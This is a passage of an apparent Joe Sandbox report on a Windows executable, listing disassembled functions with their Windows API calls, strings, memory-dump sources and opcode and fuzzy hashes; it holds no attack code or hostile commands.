Opcode Fuzzy Hash: c5b599ebde21c2d1572fd433537d2fbcef4f374b0d874dc7aa19531ac3c15617
Instruction Fuzzy Hash: 1E21D335604115AFDB14EB24C844FBABBA5EF85324F148158F4268B6E2C775FC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A578F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A58D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00A5790A,?,000000FF,?,00A58754,00000000,?,0000001C,?,?), ref: 00A58D8C
Part of subcall function 00A58D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00A58DB2
Part of subcall function 00A58D7D: lstrcmpiW.KERNEL32(00000000,?,00A5790A,?,000000FF,?,00A58754,00000000,?,0000001C,?,?), ref: 00A58DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00A58754,00000000,?,0000001C,?,?,00000000), ref: 00A57923
lstrcpyW.KERNEL32(00000000,?), ref: 00A57949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00A58754,00000000,?,0000001C,?,?,00000000), ref: 00A57984

Strings

cdecl, xrefs: 00A5797B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 87f7ded92076b9373daa441a999d5183ccc5281cf31bb84b133d7a99504aa745
Instruction ID: b5b8e6efb72ba538686988ad14ce9d3da1ad56e73bb4cfdef6fe305d2cc74341
Opcode Fuzzy Hash: 87f7ded92076b9373daa441a999d5183ccc5281cf31bb84b133d7a99504aa745
Instruction Fuzzy Hash: F211033A200242AFCB259F35E844E7A77A9FF85351B00402AFC06DB2A5EB319805C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A87CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00A87D0B
SetWindowLongW.USER32 ref: 00A87D2A
SetWindowLongW.USER32 ref: 00A87D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A87D6B

Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 825100b02a847e0d11ded0f6590bfb954172e25dae9df4a37910a8fddf660a98
Instruction ID: 8025157ce62c677671465657b23a0cd02ca117acc0cb14f2b3dff63993c743a6
Opcode Fuzzy Hash: 825100b02a847e0d11ded0f6590bfb954172e25dae9df4a37910a8fddf660a98
Instruction Fuzzy Hash: 68115E32605615AFCB10AF68DC04EAA3BA5AF463B0B254724F835D72E1E730D951DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A85660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00A856BB
_wcslen.LIBCMT ref: 00A856CD
_wcslen.LIBCMT ref: 00A856D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A85816

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: d61cb7f41488fb0b66e0c7ae9e313b7dcafecf3ae958c63fb458d71a41ba283d
Instruction ID: 17d70d4020bcf6dbc765b68dca5d64ffdc889198fe24a9e3687f7a486b0d0eee
Opcode Fuzzy Hash: d61cb7f41488fb0b66e0c7ae9e313b7dcafecf3ae958c63fb458d71a41ba283d
Instruction Fuzzy Hash: B111BE75E00608A6DF20EFB58C85AEE77BCAF11760B10803AFD15D6081EB74CA84CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A51A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00A51A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A51A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A51A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A51A8A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8bf6e25226a03d28060d09551f2e8608b22087ce59ed57490d342ca27abf351
Instruction ID: 426ff03e0a4970988d3f9790bea2b73ecf2930f1bc87cd45dda159623cc3f0c0
Opcode Fuzzy Hash: d8bf6e25226a03d28060d09551f2e8608b22087ce59ed57490d342ca27abf351
Instruction Fuzzy Hash: A711097AD01219FFEB11DBA5CD85FADBB78FB08750F2000A1EA04B7290D6716E51DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00A5E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A5E1FD
MessageBoxW.USER32 ref: 00A5E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A5E246
CloseHandle.KERNEL32(00000000), ref: 00A5E24D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 8029a91c5503a6b559167b74817bda859d11eb1efc2c221e4c7a7d623f6a3195
Instruction ID: c7a5f38ab9eb9445989e62ba76ebee53f92cbae87169b3c7f34898d0105d3c13
Opcode Fuzzy Hash: 8029a91c5503a6b559167b74817bda859d11eb1efc2c221e4c7a7d623f6a3195
Instruction Fuzzy Hash: 6011C476A04254BBCB05DFE8AC09EDE7FACEB46325F044255F924E7391D6B08A058BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00A1CFF9,00000000,00000004,00000000), ref: 00A1D218
GetLastError.KERNEL32 ref: 00A1D224
__dosmaperr.LIBCMT ref: 00A1D22B
ResumeThread.KERNEL32(00000000), ref: 00A1D249

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 53b72a4df8febd46889dd217a148bb18d024090ec55c415b7677172f81d87253
Instruction ID: af9caa2ce25733b504c83ba4a195cefd0f764c0802f449eeea4a78f334454975
Opcode Fuzzy Hash: 53b72a4df8febd46889dd217a148bb18d024090ec55c415b7677172f81d87253
Instruction Fuzzy Hash: 3301F536805214BBDB119BA5DC09BEE7B6DEF81730F200319F935961D0DB71C982C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 009F600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 009F604C
GetStockObject.GDI32(00000011), ref: 009F6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 009F606A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 1b07bdd94db8d5b285cf0548a2d314f1de16e1635d9b4bd13b319d713b6327c8
Instruction ID: 37b2c896a352812838c18a313766e8aedce92ef5cb4846943fcae18a4db319af
Opcode Fuzzy Hash: 1b07bdd94db8d5b285cf0548a2d314f1de16e1635d9b4bd13b319d713b6327c8
Instruction Fuzzy Hash: A2115B7250160CBFEF128FA59C44EFABB6DEF093A4F180216FA1552110DB369C619FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A13B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00A13B56

Part of subcall function 00A13AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00A13AD2
Part of subcall function 00A13AA3: ___AdjustPointer.LIBCMT ref: 00A13AED

_UnwindNestedFrames.LIBCMT ref: 00A13B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00A13B7C
CallCatchBlock.LIBVCRUNTIME ref: 00A13BA4

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 837e91db74820eeb94c56456b2516b161f6cfe031717a1a971ae67978f221410
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 2E01E973100149BBDF126F99CD46EEB7B6AEF5C754F044014FE4856121D732E9A1DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A57464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00A5747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00A57497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00A574AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00A574CA

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 247001e1a2db32618efde2d883abcfe1aa95b51596f6bc59e138ecf862db5202
Instruction ID: 2be37937984a220421be0e43996e44dc7cbe49e1362a28f9f9296ad0ee4ca0a1
Opcode Fuzzy Hash: 247001e1a2db32618efde2d883abcfe1aa95b51596f6bc59e138ecf862db5202
Instruction Fuzzy Hash: 33118BB5205310ABE720CF68EC08F9A7BFCFB00B11F108569AA16E6191D7B0E948DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00A5B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A5ACD3,?,00008000), ref: 00A5B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A5ACD3,?,00008000), ref: 00A5B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A5ACD3,?,00008000), ref: 00A5B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A5ACD3,?,00008000), ref: 00A5B126

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 3c2a78b38117fb5bbd7c94b7b19f9dc05194f0044b2d6de49139019515a889cc
Instruction ID: 1d47446cea6b6e14146fac469d0c4b6a23c328582f8ee176998b006f20df80ab
Opcode Fuzzy Hash: 3c2a78b38117fb5bbd7c94b7b19f9dc05194f0044b2d6de49139019515a889cc
Instruction Fuzzy Hash: 47115B31C1192CEBCF00EFE9E9986EEBB78FF09722F104685E941B2185CB3056558B61

Uniqueness

Uniqueness Score: -1.00%

Function 00A52DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A52DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00A52DD6
GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00A52DDD
AttachThreadInput.USER32(00000000,?,00000000), ref: 00A52DE4

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: a02acddd6aebb1bcd48b64553b9e322bcc65a36ab2cee81fbbe3b6476f171d9c
Instruction ID: 62aed3e8c6ea73301159384ba6b7a6b308b743f27394194e89d8f2969ce5e765
Opcode Fuzzy Hash: a02acddd6aebb1bcd48b64553b9e322bcc65a36ab2cee81fbbe3b6476f171d9c
Instruction Fuzzy Hash: 4DE06D721012247AD7205BA2AC0DFEB7E6CFB43BB2F001125B905D1080AAB48946CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00A88863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00A09639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00A09693
Part of subcall function 00A09639: SelectObject.GDI32(?,00000000), ref: 00A096A2
Part of subcall function 00A09639: BeginPath.GDI32(?), ref: 00A096B9
Part of subcall function 00A09639: SelectObject.GDI32(?,00000000), ref: 00A096E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00A88887
LineTo.GDI32(?,?,?), ref: 00A88894
EndPath.GDI32(?), ref: 00A888A4
StrokePath.GDI32(?), ref: 00A888B2

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 508b0e92b11010d5f13071b035374b10c98016dd78387a1de4563f1c8dbe821b
Instruction ID: a44d4d1bd6c93f5b76d80d5be8ea3c85a6f4f5609c05c7b9ef04fcc04454a4cd
Opcode Fuzzy Hash: 508b0e92b11010d5f13071b035374b10c98016dd78387a1de4563f1c8dbe821b
Instruction Fuzzy Hash: 88F0DA36145259BADB12AFD4AC09FCA3A69AF06360F448100FA11650E2CBB95552DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A098B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 00A098CC
SetTextColor.GDI32(?,?), ref: 00A098D6
SetBkMode.GDI32(?,00000001), ref: 00A098E9
GetStockObject.GDI32(00000005), ref: 00A098F1

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 9b3b7434bb79d23baa16c1f52d77ffbe2caed52247501b16179be064c6c20e97
Instruction ID: 047266ad3c7c8aed716774ece636707bb034e7093795ce5110ab586db14ec340
Opcode Fuzzy Hash: 9b3b7434bb79d23baa16c1f52d77ffbe2caed52247501b16179be064c6c20e97
Instruction Fuzzy Hash: 46E06D31244284AEDB219BB4BC0DBED3F20AB52376F04831AF6FA580E1C37146419F21

Uniqueness

Uniqueness Score: -1.00%

Function 00A5162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00A51089,?,?,?,00A511D9), ref: 00A51634
OpenThreadToken.ADVAPI32(00000000,?,?,?,00A511D9), ref: 00A5163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A511D9), ref: 00A51648
OpenProcessToken.ADVAPI32(00000000,?,?,?,00A511D9), ref: 00A5164F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: fe1058164c1c00ff3f63cec6e46071f6f1a77576c82fe47f102ca991adf1a5bc
Instruction ID: 0f1f525b42d18ddc852c6431fa3235e7e964a237deee35279796c8052ddf8ebc
Opcode Fuzzy Hash: fe1058164c1c00ff3f63cec6e46071f6f1a77576c82fe47f102ca991adf1a5bc
Instruction Fuzzy Hash: B8E04632602211ABD7206BF0AE0DB963B78AF557A6F158808F645C9080E63485468B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00A4D858
GetDC.USER32(00000000), ref: 00A4D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A4D882
ReleaseDC.USER32(?), ref: 00A4D8A3

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: ed6dd8dca8840fc9dcfefb9fbfbb471acbe4d9cf704ac1643cc45b68e179e6c7
Instruction ID: 5b7a29867d5001378c808069448144aa8264b308fee23cd0883ee7d2e32a7f6b
Opcode Fuzzy Hash: ed6dd8dca8840fc9dcfefb9fbfbb471acbe4d9cf704ac1643cc45b68e179e6c7
Instruction Fuzzy Hash: 10E09AB5800209DFCB41DFF0E90866DFBB5FB48321F149469E946E7250D7385942AF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00A4D86C
GetDC.USER32(00000000), ref: 00A4D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A4D882
ReleaseDC.USER32(?), ref: 00A4D8A3

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: af42e7aa76e2d4a060c179a30167e72a7b58f5303a70f03c577368494c359f4c
Instruction ID: 97d50c25eac6fe6e2f0f3b6fd80587e8136dc029f513a3e47acf26aa69ab4336
Opcode Fuzzy Hash: af42e7aa76e2d4a060c179a30167e72a7b58f5303a70f03c577368494c359f4c
Instruction Fuzzy Hash: E2E092B5800209EFCB51EFF0E90866DBBB5BB48321B149469E94AE7250DB385902AF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A64D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 009F7620: _wcslen.LIBCMT ref: 009F7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00A64ED4

Strings

LPT, xrefs: 00A64DFB
*, xrefs: 00A64E10

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 77886bba67edbeacc988962331cb4ec31473914445a4a5ee30b4a1e3d274d100
Instruction ID: 81bffa2df91810d90e4fc763111c3fd96711b7e100754d732bebe9dbbbcffd83
